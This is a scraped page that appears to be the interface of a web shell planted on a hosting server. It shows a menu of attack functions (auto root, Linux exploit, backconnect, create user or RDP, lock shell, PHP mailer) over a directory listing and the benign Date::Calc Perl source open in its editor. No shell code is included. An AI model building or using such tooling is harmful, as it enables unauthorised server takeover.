Linux web0273.sh.tyo1 4.18.0-553.141.2.lve.el7h.x86_64 #1 SMP Wed Jul 8 17:20:31 UTC 2026 x86_64
Apache
: 127.0.0.1 | : 216.73.216.133
Cant Read [ /etc/named.conf ]
8.3.31
r2745769
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
usr /
share /
perl5 /
vendor_perl /
Date /
[ HOME SHELL ]
Name
Size
Permission
Action
Calc
[ DIR ]
drwxr-xr-x
Calendar
[ DIR ]
drwxr-xr-x
Handler
[ DIR ]
drwxr-xr-x
Holidays
[ DIR ]
drwxr-xr-x
ICal
[ DIR ]
drwxr-xr-x
Language
[ DIR ]
drwxr-xr-x
Manip
[ DIR ]
drwxr-xr-x
Calc.pm
2.08
KB
-rw-r--r--
Calc.pod
106.86
KB
-rw-r--r--
Calendar.pm
6.37
KB
-rw-r--r--
Calendar.pod
20.43
KB
-rw-r--r--
Easter.pm
5.07
KB
-rwxr-xr-x
Format.pm
9.42
KB
-rw-r--r--
Handler.pm
15.78
KB
-rw-r--r--
Handler.pod
16.58
KB
-rw-r--r--
ICal.pm
31.75
KB
-rw-r--r--
ISO8601.pm
15.28
KB
-rw-r--r--
Language.pm
2.6
KB
-rw-r--r--
Leapyear.pm
954
B
-rw-r--r--
Manip.pm
1.21
KB
-rw-r--r--
Manip.pod
12.16
KB
-rw-r--r--
Parse.pm
8.73
KB
-rw-r--r--
Range.pm
5.36
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : Calc.pm
############################################################################### ## ## ## Copyright (c) 1995 - 2009 by Steffen Beyer. ## ## All rights reserved. ## ## ## ## This package is free software; you can redistribute it ## ## and/or modify it under the same terms as Perl itself. ## ## ## ############################################################################### package Date::Calc; use strict; use vars qw($XS_OK $XS_DISABLE @ISA @EXPORT @EXPORT_OK %EXPORT_TAGS $VERSION); BEGIN # Re-export imports from Date::Calc::XS or Date::Calc::PP: { require Exporter; @ISA = qw(Exporter); $XS_OK = 0; unless ($XS_DISABLE and $XS_DISABLE) # prevent warning "used only once" { eval { require Date::Calc::XS; @EXPORT = (@Date::Calc::XS::EXPORT); @EXPORT_OK = (@Date::Calc::XS::EXPORT_OK); %EXPORT_TAGS = (all => [@EXPORT_OK]); Date::Calc::XS->import(@EXPORT,@EXPORT_OK); }; if ($@) { die $@ unless ($@ =~ /^Can't locate .*? at /); } else { $XS_OK = 1; } } unless ($XS_OK) { require Date::Calc::PP; @EXPORT = (@Date::Calc::PP::EXPORT); @EXPORT_OK = (@Date::Calc::PP::EXPORT_OK); %EXPORT_TAGS = (all => [@EXPORT_OK]); Date::Calc::PP->import(@EXPORT,@EXPORT_OK); } } ################################################## ## ## ## "Version()" is available but not exported ## ## in order to avoid possible name clashes. ## ## Call with "Date::Calc::Version()" instead! ## ## ## ################################################## $VERSION = '6.3'; sub Version { return $VERSION; } 1; __END__
Close